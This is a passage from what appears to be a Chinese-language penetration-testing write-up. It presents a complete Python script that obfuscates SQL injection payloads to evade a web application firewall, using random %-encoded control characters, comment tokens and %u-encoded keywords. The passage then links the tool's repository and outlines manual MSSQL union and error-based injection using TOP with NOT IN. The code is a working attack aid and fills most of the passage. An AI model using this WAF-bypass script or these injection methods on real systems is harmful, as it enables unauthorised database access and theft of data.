5.最后拓展下payload接收.最终代码如下
import random def bypass(payload): chars1 = ['%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0A', '%0B', '%0C', '%0D', '%0E', '%0F', '%10', '%11','%12', '%13', '%14', '%15', '%16', '%17', '%18', '%19', '%1A', '%1B', '%1C', '%1D', '%1E', '%1F', '%20'] chars2 = ["/**/", "/*!*/", "/*!safe6*/", "+"] v = random.choice(chars1) payload = payload.replace(" ", random.choice(chars2)) payload = payload.replace("=", v + "=" + v) payload = payload.replace("AND", v + "AND" + v) payload = payload.replace("and", v + "AND" + v) payload = payload.replace("WHERE", v + "WHERE" + v) payload = payload.replace("where", v + "where" + v) payload = payload.replace("UNION", "u%u006eion") payload = payload.replace("union", "u%u006eion") payload = payload.replace("CHAR", "%u0063har") payload = payload.replace("char", "%u0063har") payload = payload.replace("SELECT", "se%u006cect") payload = payload.replace("select", "se%u006cect") payload = payload.replace("FROM", "%u0066rom") payload = payload.replace("from", "%u0066rom") payload = payload.replace("(", "+(") payload = payload.replace(".", ".+") payload = payload.replace("--", "/*!*/--") print(payload) if __name__ == '__main__': while True: payload = input("输入payload:") if payload == 'q': exit(0) if payload: bypass(payload)已经打包上传github
地址:https://github.com/safe6Sec/bypassWAF
然后就可以愉快的手注了
mssql手注从前期的来看,该注入点支持union注入和报错注入.我这边采用报错注入.
用union注入需要知道当前表有几列(和mysql一样用order by判断),还需要回显点
用报错注入主要是用top命令配合not in来进行注入